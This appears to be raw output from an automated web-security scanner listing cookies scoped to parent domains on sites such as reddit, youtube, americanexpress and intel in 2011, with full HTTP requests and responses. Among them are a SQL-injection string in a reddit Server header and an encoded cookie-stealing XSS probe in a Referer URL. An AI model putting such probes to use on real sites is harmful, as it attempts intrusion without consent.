The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.reddit.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Set-Cookie: reddit_first=%7B%22organic_pos%22%3A%201%2C%20%22firsttime%22%3A%20%22first%22%7D; Domain=reddit.com; expires=Thu, 31 Dec 2037 23:59:59 GMT; Path=/ Server: '; DROP TABLE servertypes; -- Date: Sun, 06 Feb 2011 16:11:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 104688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" ><head><titl ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /support/HP-W8000-Desktops-manual/id/3823ag123/t/2 HTTP/1.1 Host: www.retrevo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Set-Cookie: JSESSIONID=7C9CF70A5240CFB9892A007BA287025C; Path=/ Set-Cookie: s_refType=; Domain=.retrevo.com; Expires=Sat, 05-Feb-2011 22:09:28 GMT; Path=/ Set-Cookie: u=4d9f3b67934f473891bc273394b24dad; Domain=.retrevo.com; Expires=Mon, 28-Jan-2041 22:09:27 GMT; Path=/ Set-Cookie: us=4d9f3b67934f473891bc273394b24dad; Path=/ Set-Cookie: ss=65665; Path=/ P3P: policyref="/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT" Location: /support/HP-W8000-Desktops-manual/id/3823ag123/t/2/ Content-Length: 0 Date: Sat, 05 Feb 2011 22:09:27 GMT Server: Apache-Coyote/1.1 Connection: close
XARAYASID=ms69fapvgb6kjldegl9ntpo0g1; expires=Wed, 06 Feb 2036 03:49:00 GMT; path=/; domain=.splunk.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /$|www.people.com/$|http:/www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.terra.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 06 Feb 2011 16:16:03 GMT Server: Apache X-Powered-By: PHP/5.2.10 Status: 404 Not Found Location: http://buscador.terra.com/404.aspx?ca=z&query=$%7Cwww&source=Search&curl=http://www.terra.com/$%7Cwww.people.com/$%7Chttp:/www.walmart.com/%7Chttp:/www.walmart.com/cp/toys/4171%7Chttp:/www.walmart.com/cp/Electronics/3944 Vary: User-Agent,Accept-Encoding Content-Length: 0 Content-Type: text/html Set-Cookie: WEBTRENDS_ID=173.193.214.243-1297008963.348471; path=/; expires=Fri, 01-Jan-2016 00:02:42 GMT; domain=.terra.com Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tracking/mpr.php?kunde=nokia&nwid=zx&keyword=bannerID&ctn=mg&zanpid=13849089C1902184109S14786739T1469378460744041488 HTTP/1.1 Host: www.traffictrack.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzEzODQ5MDg5QzE5MDIxODQxMDlTMTQ3ODY3MzlUJnpwYXIwPTY3N18xXzcyOHg5MF8zNjBfcHZjX2FkNG1hdGRlZGF1bHQ= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 17:40:51 GMT Server: Apache/2.2.8 (Linux/SUSE) X-Powered-By: PHP/5.2.6 Set-Cookie: iCmprnokia1=ID%3D129701405100000%3ATBL%3D11%3ACTR%3D3%3Ac8b5e4d57e6424ab9206a1a155f3db4e%3AKD%3Dnokia%3Acid%3Dzx%3Akw%3DbannerID%3ATTnw%3DZanox%3ATTprm%3D13849089C1902184109S14786739T1469378460744041488; expires=Sun, 05-Feb-2012 17:40:51 GMT; path=/; domain=traffictrack.de Pragma: public Content-Length: 43 P3P: policyref="http://www.traffictrack.de/w3c/p3p.xml", CP="ALL DSP COR NID" Connection: close Content-Type: image/gif
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.tuenti.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
tuuid=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com
s=!1012; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pixel?id=1012&r=1&nocb=1 HTTP/1.1 Host: www.wtp101.com Proxy-Connection: keep-alive Referer: http://searchnet.chitika.net/audience?cc=US&domain=homeappliance.manualsonline.com&ip=173.193.214.243&murl=aarp.thehartford.com,foxnews8.com,carinsuranceweb.com,geinterestplus.com,digestaqure.com&p=0.000700179100183313&url=http%3A%2F%2Fhomeappliance.manualsonline.com%2Fex%2Fmfg%2Fheadline%2Fm%2Fariens47888%252527%25253balert%252528document.cookie%252529%25252f%25252f8fcf167d281%2Fd%2Ftype%2Fproduct_problem&cbb=0x5FAA34DC317211E0BEB038273F87B1CA Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: synced=!adnexus!yahoo!openx!google; tuuid=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache, no-store, must-revalidate Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 21:54:21 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT Location: http://www.googleadservices.com/pagead/conversion/1024474926/?label=4q4iCODn3QEQrv7A6AM&guid=ON&script=0 P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Pragma: no-cache Set-Cookie: tuuid=38f8a1ac-1e96-40c8-8d5e-172234bf5f5f; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com Set-Cookie: s=!1012; path=/; expires=Mon, 04 Feb 2013 21:54:21 GMT; domain=.wtp101.com Content-Length: 0 Connection: keep-alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.yigg.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /americanexpress HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 22:21:11 GMT Server: Apache X-Content-Type-Options: nosniff Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com Set-Cookie: VISITOR_INFO1_LIVE=c_sXjcA9xII; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 22:21:11 GMT Set-Cookie: GEO=8c13c5354668e4ba32fe1a481a49181ccwsAAAAzVVOtwdbzTU3NVw==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Content-Length: 0 Cache-Control: no-cache Location: http://www.youtube.com/das_captcha?next=/americanexpress Content-Type: text/html; charset=utf-8 Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/208T0-OLXA8 HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /embed/5aWd_-x1oPE HTTP/1.1 Host: www.youtube.com Proxy-Connection: keep-alive Referer: http://www.owneriq.com/ownership-targeting?src=728x90_blue Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /watch HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==;
Response
HTTP/1.1 303 See Other Date: Sat, 05 Feb 2011 22:41:33 GMT Server: wiseguy/0.6.7 Content-Length: 0 X-Content-Type-Options: nosniff Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Tue, 02-Feb-2021 22:41:33 GMT Set-Cookie: GEO=f3452e70229898077c07f3ed5215d0bccwsAAAAzR0KtwdbzTU3SHQ==; path=/; domain=.youtube.com Expires: Tue, 27 Apr 1971 19:44:06 EST Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=CrHMDXZiHhCUCPfGVgtkSCBPdNSPzrhpn39-4I0L1XlfYvtYQ65-g8BaNDzM0uvf0Fn3FBlNQPxx3x8F51dId1BM4l3GLR1CUlZRwARyBvuJGEH6uebWuDte2Mspaox32XrVLifz_DSu13T18jAndZqkw6SyNqAbodrsRXwistnr1fL1DI8fql0wyuEPVqwachJzW5W5oAHj0CE2z2KGV7SaDdqUzk0et3zj0IK7NUi1JP6mtyX9fWBLma2l7pFTLElmp2bI20SHDgKHyDO-_DvZr5Ok3mm6IbRA8SgfJ0OhiLACa3Jf-A Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tpv/?11259580C1463786597S14786739T&zpar0=125_1_728x90_360_pvc_ad4matdedault&zanpid=14786739C435671106T1469378458521060355 HTTP/1.1 Host: www.zanox-affiliate.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL3d3dy56YW5veC1hZmZpbGlhdGUuZGUvdHB2Lz8xMTI1OTU4MEMxNDYzNzg2NTk3UzE0Nzg2NzM5VCZ6cGFyMD0xMjVfMV83Mjh4OTBfMzYwX3B2Y19hZDRtYXRkZWRhdWx0 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 06 Feb 2011 17:39:22 GMT Server: Microsoft-IIS/6.0 P3P: policyref="http://www.zanox-affiliate.de/w3c/p3p.xml", CP="NOI CUR OUR STP" X-Powered-By: ASP.NET Set-Cookie: zttpvc=5C2945S1469387008513466368T0I11259580C0SV1LJMVy4dqmqo38356976y83y85qeyq140ya19ya5954s92yb3930ybbq71alyc3rq790phesxabzugyddydfT0; domain=.zanox-affiliate.de; path=/ Set-Cookie: zptpvc=5C2945S1469387008513466368T0I11259580C0SV1LJMVy4dqmqo38356976y83y85qeyq140ya19ya5954s92yb3930ybbq71alyc3rq790phesxabzugyddydfT0; expires=Sat, 07-May-2011 17:39:22 GMT; domain=.zanox-affiliate.de; path=/ Content-Length: 0 Location: http://www.active-srv02.de/werbemittel/WebObjects/werbemittel.woa/wa/ads?apid=1198bf95-a2d2-4954-bf8c-6a476a8fb377&zanpid=11259580C1463786597S14786739T1469387008513466368&zanpartner=1049301 pragma: no-cache cache-control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /consumertravel/travel.do HTTP/1.1 Host: www134.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /premium/credit-card-travel-insurance/home.do?source=footer_prem_services HTTP/1.1 Host: www152.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-card-compare/business-travel-rewards-credit-cards/29789?inav=menu_cards_sbc_comparecards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:41 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944501386119; path=/; expires=Tue, 09-Feb-16 22:21:41 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000q3QZbDYOcyvtP0PZminOCss:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Language: en-US Content-Length: 200661
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/business-solutions/overview HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:44 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944504607994; path=/; expires=Tue, 09-Feb-16 22:21:44 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000kscO5hdpunXSAOCMFtkSRfr:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 40955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/find-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:35 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944495304108; path=/; expires=Tue, 09-Feb-16 22:21:35 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000JTfdlyvElahRUmUBPW_Sr5S:1115nbqmn;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 83384
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /business-credit-cards/see-all-business-credit-cards HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:42 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944502510060; path=/; expires=Tue, 09-Feb-16 22:21:42 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000yq-Xh-WxMu4vUVCexozgN5B:1115nbtvb;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 78468
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/ HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:27 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944487071298; path=/; expires=Tue, 09-Feb-16 22:21:27 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000rksCcDlHmzQipsUe7BzBjnC:10ue6mmd9;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getthecard/home?sj_tabToOpen=1&inav=menu_cards_pc_choosecard HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:21:23 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944483932373; path=/; expires=Tue, 09-Feb-16 22:21:23 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0000oFplttRUbELe348jm0hGGKR:10ue6mp18;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 48572
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MobileWeb/index.jsp HTTP/1.1 Host: www201.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:22:06 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944526576342; path=/; expires=Tue, 09-Feb-16 22:22:06 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=0001PGzoPxDqqpRWVuPalmTJrf8:11m1380s8;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 33070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PowerLabsWeb/un/landingpage.htm HTTP/1.1 Host: www213.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:23:33 GMT Server: IBM_HTTP_Server Set-Cookie: SaneID=173.193.214.243-1296944613478399; path=/; expires=Tue, 09-Feb-16 22:23:33 GMT; domain=.americanexpress.com Set-Cookie: JSESSIONID=00000YZCQTdcKvGRMYP-Rq79eWY:129nma7r7;Path=/ Cache-Control: no-cache="set-cookie,set-cookie2" Expires: Thu, 01 Dec 1994 16:00:00 GMT Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 81548
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/home.do HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cards/shopping/index.jsp HTTP/1.1 Host: www217.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
s_vi=[CS]v1|26A6E87F85163F0C-400001824071395A[CE]; Expires=Thu, 4 Feb 2016 22:36:47 GMT; Domain=.intel.com; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806?AQB=1&ndh=1&t=5/1/2011%2016%3A34%3A7%206%20360&ce=UTF-8&pageName=sw%3Ajoin&g=http%3A//appdeveloper.intel.com/en-us/join&r=http%3A//burp/show/22&cc=USD&ch=sw&events=event5%2Cevent9&c1=app%20developer&h1=sw%7Capp%20developer%7Cen-us%7Cuser%7Cjoin%7Chome&c2=en-us&c3=user&v3=sw%3Ajoin&c4=asmo-na&v4=http%3A//appdeveloper.intel.com/en-us/join&c5=en-us&v6=app%20developer&c7=intelappdeveloper%2Cintelcorpsw&v7=en-us&c8=http%3A//appdeveloper.intel.com/en-us/join&v8=user&c9=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D&c13=Version%204.3&c14=sw%3Ajoin&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c25=user&v28=http%3A//appdeveloper.intel.com/en-us/join&c43=user%7Cjoin%7Chome&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1 Host: www91.intel.com Proxy-Connection: keep-alive Referer: http://appdeveloper.intel.com/en-us/join Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296945247431; s_lv_s=First%20Visit; cf=1
Response
HTTP/1.1 302 Found Date: Sat, 05 Feb 2011 22:36:47 GMT Server: Omniture DC/2.0.0 Set-Cookie: s_vi=[CS]v1|26A6E87F85163F0C-400001824071395A[CE]; Expires=Thu, 4 Feb 2016 22:36:47 GMT; Domain=.intel.com; Path=/ Location: http://www91.intel.com/b/ss/intelcorp,intelappdeveloper,intelcorpsw/1/H.20.3/s73248818481806?AQB=1&pccr=true&vidn=26A6E87F85163F0C-400001824071395A&&ndh=1&t=5/1/2011%2016%3A34%3A7%206%20360&ce=UTF-8&pageName=sw%3Ajoin&g=http%3A//appdeveloper.intel.com/en-us/join&r=http%3A//burp/show/22&cc=USD&ch=sw&events=event5%2Cevent9&c1=app%20developer&h1=sw%7Capp%20developer%7Cen-us%7Cuser%7Cjoin%7Chome&c2=en-us&c3=user&v3=sw%3Ajoin&c4=asmo-na&v4=http%3A//appdeveloper.intel.com/en-us/join&c5=en-us&v6=app%20developer&c7=intelappdeveloper%2Cintelcorpsw&v7=en-us&c8=http%3A//appdeveloper.intel.com/en-us/join&v8=user&c9=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D&c13=Version%204.3&c14=sw%3Ajoin&c16=First%20Visit&v16=First%20Visit&c17=new&v17=new&c25=user&v28=http%3A//appdeveloper.intel.com/en-us/join&c43=user%7Cjoin%7Chome&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&p=Chrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BShockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.230.5%3BJava%28TM%29%20Platform%20SE%206%20U23%3BWPI%20Detector%201.1%3BGoogle%20Update%3BSilverlight%20Plug-In%3BDefault%20Plug-in%3B&AQE=1 X-C: ms-4.3.1 Expires: Fri, 04 Feb 2011 22:36:47 